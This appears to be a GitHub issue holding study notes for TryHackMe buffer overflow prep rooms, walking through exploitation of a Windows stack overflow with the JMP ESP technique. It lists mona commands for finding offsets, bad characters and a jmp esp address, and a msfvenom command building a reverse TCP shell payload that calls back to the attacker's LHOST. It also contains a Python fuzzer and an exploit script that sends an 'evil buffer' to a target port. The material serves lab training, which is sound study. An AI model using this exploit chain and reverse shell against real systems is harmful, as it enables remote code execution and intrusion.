Open WDavid404 opened 9 months ago
we have our shellcode on the stack, and we need to move to that address without specifying the shellcode hardcoded address directly. We can use the JMP instruction, to jump to the stack, and stack top is pointed to by the ESP register.
we overwrite the return address with the address of this “JMP ESP” instruction, and when the return address executes this instruction, it will return to the stack.
EIP is the instruction pointer. It points to (holds the address of) the first byte of the next instruction to be executed. ESP is the stack pointer. It points to (holds the address of) the most-recently pushed value on the stack.
Immunity Debugger
!mona config -set workingfolder c:\mona\%p
Find offset
-- /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 700
-- !mona findmsp -distance 700
Find bad characters: -- generate bytearray
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()
-- !mona bytearray -b "\x00"
--!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>
Find jmp esp command: -- !mona jmp -r esp -cpb "\x00\x07\x2e\xa0" (bad characters)
--》 the address 625011AF
Update our retn variable with the new address and must be written backward (since the system is little-endian=Reverse).
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00{bad characters}" -f python
padding = "\x90" * 16
Note:不要一下子发送太长的byte的payload: 比如OVERFlow2,在700bytes时就能发生问题(EIP变成AAAA),但是如果发送5000个bytes的payload,EIP则不会是AAAA
ip = "10.10.198.14"
port = 1337
prefix = "OVERFLOW3 "
offset = 1000
overflow = "A" * offset
retn = ""
padding = "\x90" * 16
payload=""
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
#!/usr/bin/env python3
import socket, time, sys
ip = "10.10.198.14"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
except:
print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)
generate bytearray: all_chars.py
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()
Good video: https://www.youtube.com/watch?v=skvjS4OX8cg
https://tryhackme.com/room/bof1 https://tryhackme.com/room/bufferoverflowprep